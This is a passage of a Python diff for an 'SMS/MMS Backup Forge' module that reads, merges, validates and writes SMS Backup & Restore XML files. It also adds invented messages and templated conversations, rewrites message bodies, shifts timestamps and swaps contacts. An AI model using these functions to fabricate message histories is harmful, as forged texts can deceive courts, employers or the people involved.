int(elem.get('date', '0')), + 'ct_t': elem.get('ct_t', 'application/vnd.wap.multipart.related'), + 'msg_box': int(elem.get('msg_box', '1')), + 'address': elem.get('address', ''), + 'sub': elem.get('sub', 'null'), + 'retr_st': elem.get('retr_st', 'null'), + 'd_tm': elem.get('d_tm', 'null'), + 'exp': elem.get('exp', 'null'), + 'locked': int(elem.get('locked', '0')), + 'm_id': elem.get('m_id', 'null'), + 'st': elem.get('st', 'null'), + 'retr_txt_cs': elem.get('retr_txt_cs', 'null'), + 'retr_txt': elem.get('retr_txt', 'null'), + 'creator': elem.get('creator', 'null'), + 'date_sent': elem.get('date_sent', '0'), + 'seen': int(elem.get('seen', '1')), + 'm_size': elem.get('m_size', 'null'), + 'rr': elem.get('rr', '129'), + 'sub_cs': elem.get('sub_cs', 'null'), + 'resp_st': elem.get('resp_st', 'null'), + 'ct_cls': elem.get('ct_cls', 'null'), + 'm_cls': elem.get('m_cls', 'personal'), + 'd_rpt': elem.get('d_rpt', '129'), + 'v': elem.get('v', '18'), + '_id': elem.get('_id', '1'), + 'tr_id': elem.get('tr_id', 'null'), + 'resp_txt': elem.get('resp_txt', 'null'), + 'ct_l': elem.get('ct_l', 'null'), + 'm_type': elem.get('m_type', '132'), + 'readable_date': elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + 'pri': elem.get('pri', '129'), + 'sub_id': elem.get('sub_id', '-1'), + 'text_only': elem.get('text_only', '0'), + 'parts': [], + 'addrs': [], + 'body': '', + } + + parts_elem = elem.find('parts') + if parts_elem is not None: + for part_elem in parts_elem.findall('part'): + part = { + 'seq': part_elem.get('seq', '0'), + 'ct': part_elem.get('ct', 'text/plain'), + 'name': part_elem.get('name', 'null'), + 'chset': part_elem.get('chset', 'null'), + 'cd': part_elem.get('cd', 'null'), + 'fn': part_elem.get('fn', 'null'), + 'cid': part_elem.get('cid', 'null'), + 'cl': part_elem.get('cl', 'null'), + 'ctt_s': part_elem.get('ctt_s', 'null'), + 'ctt_t': part_elem.get('ctt_t', 'null'), + 'text': part_elem.get('text', 'null'), + 'data': part_elem.get('data', 'null'), + } + msg['parts'].append(part) + # Extract body text from text/plain part + if part['ct'] == 'text/plain' and part['text'] != 'null': + msg['body'] = part['text'] + + addrs_elem = elem.find('addrs') + if addrs_elem is not None: + for addr_elem in addrs_elem.findall('addr'): + addr = { + 'address': addr_elem.get('address', ''), + 'type': addr_elem.get('type', '137'), + 'charset': addr_elem.get('charset', '106'), + } + msg['addrs'].append(addr) + + return msg + + def save_backup(self, output_path: str) -> Dict[str, Any]: + """Save current state to XML in SMS Backup & Restore format.""" + try: + xml_str = self._build_xml() + out = Path(output_path) + out.parent.mkdir(parents=True, exist_ok=True) + out.write_text(xml_str, encoding='utf-8') + return { + 'ok': True, + 'path': str(out), + 'count': len(self._messages), + 'size': out.stat().st_size, + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def merge_backups(self, paths: List[str]) -> Dict[str, Any]: + """Merge multiple backup files, deduplicating by date+address+body.""" + seen = set() + for msg in self._messages: + seen.add(self._dedup_key(msg)) + + added = 0 + errors = [] + for p in paths: + try: + tree = ET.parse(p) + root = tree.getroot() + if root.tag != 'smses': + errors.append(f'{p}: root element is not ') + continue + + for elem in root: + if elem.tag == 'sms': + key = f"{elem.get('date', '0')}|{elem.get('address', '')}|{elem.get('body', '')}" + if key not in seen: + seen.add(key) + msg = { + 'msg_kind': 'sms', + 'protocol': elem.get('protocol', '0'), + 'address': elem.get('address', ''), + 'date': int(elem.get('date', '0')), + 'type': int(elem.get('type', '1')), + 'subject': elem.get('subject', 'null'), + 'body': elem.get('body', ''), + 'toa': elem.get('toa', 'null'), + 'sc_toa': elem.get('sc_toa', 'null'), + 'service_center': elem.get('service_center', 'null'), + 'read': int(elem.get('read', '1')), + 'status': int(elem.get('status', '-1')), + 'locked': int(elem.get('locked', '0')), + 'sub_id': elem.get('sub_id', '-1'), + 'readable_date': elem.get('readable_date', ''), + 'contact_name': elem.get('contact_name', '(Unknown)'), + } + self._messages.append(msg) + added += 1 + elif elem.tag == 'mms': + mms_msg = self._parse_mms_element(elem) + key = self._dedup_key(mms_msg) + if key not in seen: + seen.add(key) + self._messages.append(mms_msg) + added += 1 + except Exception as e: + errors.append(f'{p}: {e}') + + self._messages.sort(key=lambda m: m.get('date', 0)) + result: Dict[str, Any] = { + 'ok': True, + 'total': len(self._messages), + 'added': added, + } + if errors: + result['errors'] = errors + return result + + def _dedup_key(self, msg: Dict[str, Any]) -> str: + """Generate a deduplication key from a message dict.""" + date_val = str(msg.get('date', '0')) + addr = msg.get('address', '') + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + return f"{date_val}|{addr}|{body}" + + def get_backup_stats(self) -> Dict[str, Any]: + """Return stats: message count, contacts, date range, SMS/MMS breakdown.""" + if not self._messages: + return { + 'total': 0, + 'sms_count': 0, + 'mms_count': 0, + 'contacts': [], + 'date_range': None, + 'sent': 0, + 'received': 0, + } + + sms_count = sum(1 for m in self._messages if m.get('msg_kind') == 'sms') + mms_count = sum(1 for m in self._messages if m.get('msg_kind') == 'mms') + + contacts: Dict[str, Dict[str, Any]] = {} + for m in self._messages: + addr = m.get('address', '') + name = m.get('contact_name', '(Unknown)') + if addr not in contacts: + contacts[addr] = {'address': addr, 'name': name, 'count': 0} + contacts[addr]['count'] += 1 + + dates = [m.get('date', 0) for m in self._messages if m.get('date', 0) > 0] + date_range = None + if dates: + date_range = { + 'earliest': min(dates), + 'latest': max(dates), + 'earliest_readable': self._timestamp_to_readable(min(dates)), + 'latest_readable': self._timestamp_to_readable(max(dates)), + } + + sent = 0 + received = 0 + for m in self._messages: + if m.get('msg_kind') == 'sms': + if m.get('type') == 2: + sent += 1 + elif m.get('type') == 1: + received += 1 + elif m.get('msg_kind') == 'mms': + if m.get('msg_box') == 2: + sent += 1 + elif m.get('msg_box') == 1: + received += 1 + + return { + 'total': len(self._messages), + 'sms_count': sms_count, + 'mms_count': mms_count, + 'contacts': list(contacts.values()), + 'date_range': date_range, + 'sent': sent, + 'received': received, + 'backup_set': self._backup_set, + } + + # ── Message Creation ──────────────────────────────────────────────────── + + def add_sms(self, address: str, body: str, msg_type: int = 1, + timestamp: Optional[int] = None, contact_name: str = '(Unknown)', + read: int = 1, locked: int = 0) -> Dict[str, Any]: + """Add a single SMS message. + + Args: + address: Phone number (e.g. +15551234567) + body: Message text + msg_type: 1=received, 2=sent, 3=draft, 4=outbox, 5=failed, 6=queued + timestamp: Epoch milliseconds (defaults to now) + contact_name: Display name for contact + read: 1=read, 0=unread + locked: 0=unlocked, 1=locked + """ + if timestamp is None: + timestamp = int(time.time() * 1000) + + msg = { + 'msg_kind': 'sms', + 'protocol': '0', + 'address': address, + 'date': timestamp, + 'type': msg_type, + 'subject': 'null', + 'body': body, + 'toa': 'null', + 'sc_toa': 'null', + 'service_center': 'null', + 'read': read, + 'status': -1, + 'locked': locked, + 'sub_id': '-1', + 'readable_date': self._timestamp_to_readable(timestamp), + 'contact_name': contact_name, + } + self._messages.append(msg) + return {'ok': True, 'index': len(self._messages) - 1, 'date': timestamp} + + def add_mms(self, address: str, body: str = '', + attachments: Optional[List[Dict[str, str]]] = None, + msg_box: int = 1, timestamp: Optional[int] = None, + contact_name: str = '(Unknown)') -> Dict[str, Any]: + """Add an MMS message with optional attachments. + + Args: + address: Phone number + body: Text body of the MMS + attachments: List of dicts with keys: path (file path), content_type (MIME), + or data (base64 encoded), filename + msg_box: 1=received, 2=sent, 3=draft, 4=outbox + timestamp: Epoch milliseconds + contact_name: Display name + """ + if timestamp is None: + timestamp = int(time.time() * 1000) + if attachments is None: + attachments = [] + + parts: List[Dict[str, str]] = [] + has_media = len(attachments) > 0 + + # SMIL part (required for MMS with attachments) + if has_media: + smil_body = '' + smil_body += '' + smil_body += '' + smil_body += '' + if body: + smil_body += '' + for i, att in enumerate(attachments): + fname = att.get('filename', f'attachment_{i}') + ct = att.get('content_type', 'application/octet-stream') + if ct.startswith('image/'): + smil_body += f'' + elif ct.startswith('audio/'): + smil_body += f'' + parts.append({ + 'seq': '0', 'ct': 'application/smil', 'name': 'null', + 'chset': 'null', 'cd': 'null', 'fn': 'null', + 'cid': '', 'cl': 'smil.xml', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': smil_body, 'data': 'null', + }) + + # Attachment parts + for i, att in enumerate(attachments): + fname = att.get('filename', f'attachment_{i}') + ct = att.get('content_type', 'application/octet-stream') + data = 'null' + if 'path' in att and os.path.isfile(att['path']): + data = self._encode_attachment(att['path']) + elif 'data' in att: + data = att['data'] + parts.append({ + 'seq': '0', 'ct': ct, 'name': fname, + 'chset': 'null', 'cd': 'null', 'fn': 'null', + 'cid': f'<{fname}>', 'cl': fname, + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': 'null', 'data': data, + }) + + # Text part + if body: + parts.append({ + 'seq': '0', 'ct': 'text/plain', 'name': 'null', + 'chset': '106', 'cd': 'null', 'fn': 'null', + 'cid': 'null', 'cl': 'txt000.txt', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': body, 'data': 'null', + }) + + text_only = '1' if not has_media else '0' + + # Address records + addrs = [] + if msg_box == 1: + # Received: sender is type 137, self is type 151 + addrs.append({'address': address, 'type': '137', 'charset': '106'}) + addrs.append({'address': 'insert-address-token', 'type': '151', 'charset': '106'}) + else: + # Sent: self is type 137, recipient is type 151 + addrs.append({'address': 'insert-address-token', 'type': '137', 'charset': '106'}) + addrs.append({'address': address, 'type': '151', 'charset': '106'}) + + msg: Dict[str, Any] = { + 'msg_kind': 'mms', + 'date': timestamp, + 'ct_t': 'application/vnd.wap.multipart.related', + 'msg_box': msg_box, + 'address': address, + 'sub': 'null', + 'retr_st': 'null', + 'd_tm': 'null', + 'exp': 'null', + 'locked': 0, + 'm_id': 'null', + 'st': 'null', + 'retr_txt_cs': 'null', + 'retr_txt': 'null', + 'creator': 'null', + 'date_sent': '0', + 'seen': 1, + 'm_size': 'null', + 'rr': '129', + 'sub_cs': 'null', + 'resp_st': 'null', + 'ct_cls': 'null', + 'm_cls': 'personal', + 'd_rpt': '129', + 'v': '18', + '_id': str(len(self._messages) + 1), + 'tr_id': 'null', + 'resp_txt': 'null', + 'ct_l': 'null', + 'm_type': '132', + 'readable_date': self._timestamp_to_readable(timestamp), + 'contact_name': contact_name, + 'pri': '129', + 'sub_id': '-1', + 'text_only': text_only, + 'parts': parts, + 'addrs': addrs, + 'body': body, + } + self._messages.append(msg) + return {'ok': True, 'index': len(self._messages) - 1, 'date': timestamp} + + def add_conversation(self, address: str, contact_name: str, + messages: List[Dict[str, Any]], + start_timestamp: Optional[int] = None) -> Dict[str, Any]: + """Add a full conversation from a list of message dicts. + + Each message dict: {body: str, type: int (1=received, 2=sent), delay_minutes: int} + """ + if start_timestamp is None: + start_timestamp = int(time.time() * 1000) + + current_ts = start_timestamp + added = 0 + for msg in messages: + delay = msg.get('delay_minutes', 0) + current_ts += delay * 60 * 1000 + self.add_sms( + address=address, + body=msg.get('body', ''), + msg_type=msg.get('type', 1), + timestamp=current_ts, + contact_name=contact_name, + read=msg.get('read', 1), + locked=msg.get('locked', 0), + ) + added += 1 + + return { + 'ok': True, + 'added': added, + 'start': start_timestamp, + 'end': current_ts, + } + + def generate_conversation(self, address: str, contact_name: str, + template: str, variables: Optional[Dict[str, str]] = None, + start_timestamp: Optional[int] = None) -> Dict[str, Any]: + """Generate a conversation from a template with variable substitution. + + Args: + address: Phone number + contact_name: Display name + template: Template name (e.g. 'business_meeting', 'casual_chat') + variables: Dict of variable names to values for substitution + start_timestamp: Starting epoch ms timestamp + """ + tmpl = self._get_template(template) + if tmpl is None: + return {'ok': False, 'error': f'Template not found: {template}'} + + if variables is None: + variables = {} + + messages = [] + for msg_tmpl in tmpl.get('messages', []): + body = msg_tmpl['body'] + for key, val in variables.items(): + body = body.replace('{' + key + '}', str(val)) + messages.append({ + 'body': body, + 'type': msg_tmpl.get('type', 1), + 'delay_minutes': msg_tmpl.get('delay_minutes', 0), + }) + + return self.add_conversation(address, contact_name, messages, start_timestamp) + + def bulk_add(self, csv_path: str) -> Dict[str, Any]: + """Import messages from CSV file. + + Expected CSV columns: address, body, type, timestamp, contact_name + """ + path = Path(csv_path) + if not path.exists(): + return {'ok': False, 'error': f'File not found: {csv_path}'} + try: + added = 0 + errors = [] + with open(str(path), 'r', encoding='utf-8', newline='') as f: + reader = csv.DictReader(f) + for row_num, row in enumerate(reader, start=2): + try: + address = row.get('address', '').strip() + body = row.get('body', '').strip() + msg_type = int(row.get('type', '1').strip()) + ts_str = row.get('timestamp', '').strip() + timestamp = int(ts_str) if ts_str else None + contact_name = row.get('contact_name', '(Unknown)').strip() + self.add_sms(address, body, msg_type, timestamp, contact_name) + added += 1 + except Exception as e: + errors.append(f'Row {row_num}: {e}') + result: Dict[str, Any] = {'ok': True, 'added': added} + if errors: + result['errors'] = errors + return result + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Message Modification ──────────────────────────────────────────────── + + def find_messages(self, address: Optional[str] = None, + date_from: Optional[int] = None, + date_to: Optional[int] = None, + keyword: Optional[str] = None) -> List[Dict[str, Any]]: + """Search messages with filters. Returns list of {index, ...msg} dicts.""" + results = [] + for i, msg in enumerate(self._messages): + if address and msg.get('address', '') != address: + continue + msg_date = msg.get('date', 0) + if date_from and msg_date < date_from: + continue + if date_to and msg_date > date_to: + continue + if keyword: + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + if keyword.lower() not in body.lower(): + continue + result = dict(msg) + result['index'] = i + results.append(result) + return results + + def modify_message(self, index: int, new_body: Optional[str] = None, + new_timestamp: Optional[int] = None, + new_contact: Optional[str] = None) -> Dict[str, Any]: + """Modify an existing message by index.""" + if index < 0 or index >= len(self._messages): + return {'ok': False, 'error': f'Invalid index: {index}'} + + msg = self._messages[index] + if new_body is not None: + if msg.get('msg_kind') == 'mms': + # Update text part in MMS + found_text = False + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain': + part['text'] = new_body + found_text = True + break + if not found_text: + msg.setdefault('parts', []).append({ + 'seq': '0', 'ct': 'text/plain', 'name': 'null', + 'chset': '106', 'cd': 'null', 'fn': 'null', + 'cid': 'null', 'cl': 'txt000.txt', + 'ctt_s': 'null', 'ctt_t': 'null', + 'text': new_body, 'data': 'null', + }) + msg['body'] = new_body + else: + msg['body'] = new_body + + if new_timestamp is not None: + msg['date'] = new_timestamp + msg['readable_date'] = self._timestamp_to_readable(new_timestamp) + + if new_contact is not None: + msg['contact_name'] = new_contact + + return {'ok': True, 'index': index} + + def delete_messages(self, indices: List[int]) -> Dict[str, Any]: + """Delete messages by index. Indices are processed in reverse order.""" + valid = [i for i in sorted(set(indices), reverse=True) + if 0 <= i < len(self._messages)] + for i in valid: + self._messages.pop(i) + return {'ok': True, 'deleted': len(valid), 'remaining': len(self._messages)} + + def replace_contact(self, old_address: str, new_address: str, + new_name: Optional[str] = None) -> Dict[str, Any]: + """Change contact address (and optionally name) across all messages.""" + updated = 0 + for msg in self._messages: + if msg.get('address') == old_address: + msg['address'] = new_address + if new_name is not None: + msg['contact_name'] = new_name + updated += 1 + # Also update MMS addr records + for addr in msg.get('addrs', []): + if addr.get('address') == old_address: + addr['address'] = new_address + return {'ok': True, 'updated': updated} + + def shift_timestamps(self, address: Optional[str], offset_minutes: int) -> Dict[str, Any]: + """Shift all timestamps for a contact (or all messages if address is None).""" + offset_ms = offset_minutes * 60 * 1000 + shifted = 0 + for msg in self._messages: + if address is None or msg.get('address') == address: + msg['date'] = msg.get('date', 0) + offset_ms + msg['readable_date'] = self._timestamp_to_readable(msg['date']) + shifted += 1 + return {'ok': True, 'shifted': shifted, 'offset_minutes': offset_minutes} + + # ── Conversation Templates ────────────────────────────────────────────── + + def get_templates(self) -> Dict[str, Any]: + """Return all available conversation templates (built-in + custom).""" + templates = {} + for key, tmpl in BUILTIN_TEMPLATES.items(): + templates[key] = { + 'name': tmpl['name'], + 'description': tmpl['description'], + 'variables': tmpl.get('variables', []), + 'message_count': len(tmpl.get('messages', [])), + 'messages': tmpl.get('messages', []), + 'builtin': True, + } + for key, tmpl in self._custom_templates.items(): + templates[key] = { + 'name': tmpl.get('name', key), + 'description': tmpl.get('description', ''), + 'variables': tmpl.get('variables', []), + 'message_count': len(tmpl.get('messages', [])), + 'messages': tmpl.get('messages', []), + 'builtin': False, + } + return templates + + def save_custom_template(self, key: str, template: Dict[str, Any]) -> Dict[str, Any]: + """Save a custom template.""" + self._custom_templates[key] = template + self._save_custom_templates() + return {'ok': True, 'key': key} + + def delete_custom_template(self, key: str) -> Dict[str, Any]: + """Delete a custom template.""" + if key in self._custom_templates: + del self._custom_templates[key] + self._save_custom_templates() + return {'ok': True} + return {'ok': False, 'error': f'Template not found: {key}'} + + def _get_template(self, name: str) -> Optional[Dict[str, Any]]: + """Look up a template by name from built-in and custom templates.""" + if name in BUILTIN_TEMPLATES: + return BUILTIN_TEMPLATES[name] + if name in self._custom_templates: + return self._custom_templates[name] + return None + + def _load_custom_templates(self): + """Load custom templates from disk.""" + tmpl_file = self._data_dir / 'custom_templates.json' + if tmpl_file.exists(): + try: + self._custom_templates = json.loads(tmpl_file.read_text('utf-8')) + except Exception: + self._custom_templates = {} + + def _save_custom_templates(self): + """Persist custom templates to disk.""" + tmpl_file = self._data_dir / 'custom_templates.json' + tmpl_file.write_text(json.dumps(self._custom_templates, indent=2), encoding='utf-8') + + # ── Export / Import ───────────────────────────────────────────────────── + + def export_xml(self, path: str) -> Dict[str, Any]: + """Export current messages to SMS Backup & Restore XML format.""" + return self.save_backup(path) + + def import_xml(self, path: str) -> Dict[str, Any]: + """Import messages from an XML backup file (appends to current messages).""" + old_messages = list(self._messages) + old_backup_set = self._backup_set + old_backup_date = self._backup_date + result = self.load_backup(path) + if result.get('ok'): + new_messages = list(self._messages) + self._messages = old_messages + new_messages + self._backup_set = old_backup_set + self._backup_date = old_backup_date + result['added'] = len(new_messages) + result['total'] = len(self._messages) + else: + self._messages = old_messages + self._backup_set = old_backup_set + self._backup_date = old_backup_date + return result + + def export_csv(self, path: str) -> Dict[str, Any]: + """Export current messages to CSV format.""" + try: + out = Path(path) + out.parent.mkdir(parents=True, exist_ok=True) + with open(str(out), 'w', encoding='utf-8', newline='') as f: + writer = csv.writer(f) + writer.writerow(['address', 'body', 'type', 'timestamp', + 'contact_name', 'readable_date', 'msg_kind']) + for msg in self._messages: + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + msg_type = msg.get('type', msg.get('msg_box', 1)) + writer.writerow([ + msg.get('address', ''), + body, + msg_type, + msg.get('date', 0), + msg.get('contact_name', ''), + msg.get('readable_date', ''), + msg.get('msg_kind', 'sms'), + ]) + return { + 'ok': True, + 'path': str(out), + 'count': len(self._messages), + 'size': out.stat().st_size, + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def import_csv(self, path: str) -> Dict[str, Any]: + """Import messages from CSV (same format as export_csv).""" + return self.bulk_add(path) + + def validate_backup(self, path: str) -> Dict[str, Any]: + """Validate XML structure matches SMS Backup & Restore format.""" + p = Path(path) + if not p.exists(): + return {'ok': False, 'valid': False, 'error': 'File not found'} + + issues: List[str] = [] + try: + tree = ET.parse(str(p)) + root = tree.getroot() + + if root.tag != 'smses': + issues.append(f'Root element is <{root.tag}>, expected ') + + if not root.get('count'): + issues.append('Missing count attribute on ') + else: + declared = int(root.get('count', '0')) + actual = len(list(root)) + if declared != actual: + issues.append(f'Count mismatch: declared {declared}, actual {actual}') + + if not root.get('backup_set'): + issues.append('Missing backup_set attribute') + if not root.get('backup_date'): + issues.append('Missing backup_date attribute') + + sms_req = ['address', 'date', 'type', 'body'] + mms_req = ['date', 'msg_box', 'address'] + + for i, elem in enumerate(root): + if elem.tag == 'sms': + for attr in sms_req: + if elem.get(attr) is None: + issues.append(f'SMS #{i}: missing required attribute "{attr}"') + elif elem.tag == 'mms': + for attr in mms_req: + if elem.get(attr) is None: + issues.append(f'MMS #{i}: missing required attribute "{attr}"') + parts = elem.find('parts') + if parts is None: + issues.append(f'MMS #{i}: missing element') + addrs = elem.find('addrs') + if addrs is None: + issues.append(f'MMS #{i}: missing element') + else: + issues.append(f'Element #{i}: unexpected tag <{elem.tag}>') + + return { + 'ok': True, + 'valid': len(issues) == 0, + 'issues': issues, + 'element_count': len(list(root)), + } + + except ET.ParseError as e: + return {'ok': False, 'valid': False, 'error': f'XML parse error: {e}'} + except Exception as e: + return {'ok': False, 'valid': False, 'error': str(e)} + + # ── XML Builder ───────────────────────────────────────────────────────── + + def _build_xml(self) -> str: + """Build the full XML string in SMS Backup & Restore format.""" + lines = [] + lines.append("") + lines.append('') + + count = len(self._messages) + backup_date = str(self._backup_date) + lines.append( + f'' + ) + + for msg in self._messages: + if msg.get('msg_kind') == 'mms': + lines.append(self._build_mms_element(msg)) + else: + lines.append(self._build_sms_element(msg)) + + lines.append('') + return '\n'.join(lines) + + def _build_sms_element(self, msg: Dict[str, Any]) -> str: + """Build a single XML element.""" + attrs = { + 'protocol': str(msg.get('protocol', '0')), + 'address': str(msg.get('address', '')), + 'date': str(msg.get('date', 0)), + 'type': str(msg.get('type', 1)), + 'subject': str(msg.get('subject', 'null')), + 'body': str(msg.get('body', '')), + 'toa': str(msg.get('toa', 'null')), + 'sc_toa': str(msg.get('sc_toa', 'null')), + 'service_center': str(msg.get('service_center', 'null')), + 'read': str(msg.get('read', 1)), + 'status': str(msg.get('status', -1)), + 'locked': str(msg.get('locked', 0)), + 'sub_id': str(msg.get('sub_id', '-1')), + 'readable_date': str(msg.get('readable_date', '')), + 'contact_name': str(msg.get('contact_name', '(Unknown)')), + } + attr_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in attrs.items()) + return f' ' + + def _build_mms_element(self, msg: Dict[str, Any]) -> str: + """Build a single ... XML element.""" + mms_attrs = { + 'date': str(msg.get('date', 0)), + 'ct_t': str(msg.get('ct_t', 'application/vnd.wap.multipart.related')), + 'msg_box': str(msg.get('msg_box', 1)), + 'address': str(msg.get('address', '')), + 'sub': str(msg.get('sub', 'null')), + 'retr_st': str(msg.get('retr_st', 'null')), + 'd_tm': str(msg.get('d_tm', 'null')), + 'exp': str(msg.get('exp', 'null')), + 'locked': str(msg.get('locked', 0)), + 'm_id': str(msg.get('m_id', 'null')), + 'st': str(msg.get('st', 'null')), + 'retr_txt_cs': str(msg.get('retr_txt_cs', 'null')), + 'retr_txt': str(msg.get('retr_txt', 'null')), + 'creator': str(msg.get('creator', 'null')), + 'date_sent': str(msg.get('date_sent', '0')), + 'seen': str(msg.get('seen', 1)), + 'm_size': str(msg.get('m_size', 'null')), + 'rr': str(msg.get('rr', '129')), + 'sub_cs': str(msg.get('sub_cs', 'null')), + 'resp_st': str(msg.get('resp_st', 'null')), + 'ct_cls': str(msg.get('ct_cls', 'null')), + 'm_cls': str(msg.get('m_cls', 'personal')), + 'd_rpt': str(msg.get('d_rpt', '129')), + 'v': str(msg.get('v', '18')), + '_id': str(msg.get('_id', '1')), + 'tr_id': str(msg.get('tr_id', 'null')), + 'resp_txt': str(msg.get('resp_txt', 'null')), + 'ct_l': str(msg.get('ct_l', 'null')), + 'm_type': str(msg.get('m_type', '132')), + 'readable_date': str(msg.get('readable_date', '')), + 'contact_name': str(msg.get('contact_name', '(Unknown)')), + 'pri': str(msg.get('pri', '129')), + 'sub_id': str(msg.get('sub_id', '-1')), + 'text_only': str(msg.get('text_only', '0')), + } + attr_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in mms_attrs.items()) + + lines = [f' '] + + # Parts + lines.append(' ') + for part in msg.get('parts', []): + part_attrs = { + 'seq': str(part.get('seq', '0')), + 'ct': str(part.get('ct', 'text/plain')), + 'name': str(part.get('name', 'null')), + 'chset': str(part.get('chset', 'null')), + 'cd': str(part.get('cd', 'null')), + 'fn': str(part.get('fn', 'null')), + 'cid': str(part.get('cid', 'null')), + 'cl': str(part.get('cl', 'null')), + 'ctt_s': str(part.get('ctt_s', 'null')), + 'ctt_t': str(part.get('ctt_t', 'null')), + 'text': str(part.get('text', 'null')), + 'data': str(part.get('data', 'null')), + } + pa_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in part_attrs.items()) + lines.append(f' ') + lines.append(' ') + + # Addrs + lines.append(' ') + for addr in msg.get('addrs', []): + addr_attrs = { + 'address': str(addr.get('address', '')), + 'type': str(addr.get('type', '137')), + 'charset': str(addr.get('charset', '106')), + } + aa_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in addr_attrs.items()) + lines.append(f' ') + lines.append(' ') + + lines.append(' ') + return '\n'.join(lines) + + # ── Utility ───────────────────────────────────────────────────────────── + + @staticmethod + def _generate_uuid() -> str: + """Generate a backup_set UUID.""" + return str(uuid.uuid4()) + + @staticmethod + def _timestamp_to_readable(ms_timestamp: int) -> str: + """Convert epoch milliseconds to readable date string (SMS Backup & Restore format).""" + try: + dt = datetime.fromtimestamp(ms_timestamp / 1000.0) + # Format: "Mar 1, 2023 12:45:21 PM" + if os.name == 'nt': + return dt.strftime('%b %#d, %Y %#I:%M:%S %p') + return dt.strftime('%b %-d, %Y %-I:%M:%S %p') + except (ValueError, OSError, OverflowError): + return '' + + @staticmethod + def _readable_to_timestamp(readable: str) -> Optional[int]: + """Convert readable date string to epoch milliseconds.""" + formats = [ + '%b %d, %Y %I:%M:%S %p', + '%b %d, %Y %H:%M:%S', + '%Y-%m-%d %H:%M:%S', + '%Y-%m-%dT%H:%M:%S', + '%m/%d/%Y %I:%M:%S %p', + '%m/%d/%Y %H:%M:%S', + ] + for fmt in formats: + try: + dt = datetime.strptime(readable.strip(), fmt) + return int(dt.timestamp() * 1000) + except ValueError: + continue + return None + + @staticmethod + def _escape_xml(text: str) -> str: + """Proper XML attribute escaping.""" + return html.escape(str(text), quote=True) + + @staticmethod + def _encode_attachment(file_path: str) -> str: + """Base64 encode a file for MMS attachment data.""" + with open(file_path, 'rb') as f: + return base64.b64encode(f.read()).decode('ascii') + + def get_messages(self) -> List[Dict[str, Any]]: + """Return a copy of all messages with indices.""" + result = [] + for i, msg in enumerate(self._messages): + m = dict(msg) + m['index'] = i + result.append(m) + return result + + def clear_messages(self): + """Clear all messages from the working set.""" + self._messages = [] + self._backup_set = self._generate_uuid() + self._backup_date = int(time.time() * 1000) + + def get_status(self) -> Dict[str, Any]: + """Module status information.""" + return { + 'ok': True, + 'module': 'sms_forge', + 'version': VERSION, + 'description': DESCRIPTION, + 'message_count': len(self._messages), + 'backup_set': self._backup_set, + 'data_dir': str(self._data_dir), + 'custom_templates': len(self._custom_templates), + } + + def run(self): + """CLI interactive menu for the SMS Forge module.""" + while True: + print("\n" + "=" * 60) + print(" SMS/MMS Backup Forge") + print("=" * 60) + print(f" Messages loaded: {len(self._messages)}") + print() + print(" 1. Create new backup") + print(" 2. Load existing backup") + print(" 3. Add SMS message") + print(" 4. Add MMS message") + print(" 5. Add conversation") + print(" 6. Generate from template") + print(" 7. Find messages") + print(" 8. Modify message") + print(" 9. Delete messages") + print(" 10. Replace contact") + print(" 11. Shift timestamps") + print(" 12. Export XML") + print(" 13. Export CSV") + print(" 14. Import CSV (bulk)") + print(" 15. Merge backups") + print(" 16. Validate backup") + print(" 17. View stats") + print(" 18. List templates") + print(" 0. Exit") + print() + + try: + choice = input(" Select: ").strip() + except (EOFError, KeyboardInterrupt): + break + + if choice == '0': + break + elif choice == '1': + self._cli_create_backup() + elif choice == '2': + self._cli_load_backup() + elif choice == '3': + self._cli_add_sms() + elif choice == '4': + self._cli_add_mms() + elif choice == '5': + self._cli_add_conversation() + elif choice == '6': + self._cli_generate_template() + elif choice == '7': + self._cli_find_messages() + elif choice == '8': + self._cli_modify_message() + elif choice == '9': + self._cli_delete_messages() + elif choice == '10': + self._cli_replace_contact() + elif choice == '11': + self._cli_shift_timestamps() + elif choice == '12': + self._cli_export_xml() + elif choice == '13': + self._cli_export_csv() + elif choice == '14': + self._cli_import_csv() + elif choice == '15': + self._cli_merge_backups() + elif choice == '16': + self._cli_validate() + elif choice == '17': + self._cli_stats() + elif choice == '18': + self._cli_list_templates() + else: + print(" Invalid selection.") + + # ── CLI Helpers ───────────────────────────────────────────────────────── + + def _cli_input(self, prompt: str, default: str = '') -> str: + """Read input with optional default.""" + suffix = f' [{default}]' if default else '' + try: + val = input(f' {prompt}{suffix}: ').strip() + return val if val else default + except (EOFError, KeyboardInterrupt): + return default + + def _cli_create_backup(self): + path = self._cli_input('Output path', str(self._data_dir / 'backup.xml')) + result = self.save_backup(path) + if result.get('ok'): + print(f" Backup created: {result['path']} ({result['count']} messages)") + else: + print(f" Error: {result.get('error')}") + + def _cli_load_backup(self): + path = self._cli_input('XML file path') + if not path: + print(" No path provided.") + return + result = self.load_backup(path) + if result.get('ok'): + print(f" Loaded {result['count']} messages") + else: + print(f" Error: {result.get('error')}") + + def _cli_add_sms(self): + address = self._cli_input('Phone number (e.g. +15551234567)') + body = self._cli_input('Message body') + type_str = self._cli_input('Type (1=received, 2=sent)', '1') + contact = self._cli_input('Contact name', '(Unknown)') + result = self.add_sms(address, body, int(type_str), contact_name=contact) + print(f" Added SMS at index {result['index']}") + + def _cli_add_mms(self): + address = self._cli_input('Phone number') + body = self._cli_input('Text body') + box_str = self._cli_input('Msg box (1=received, 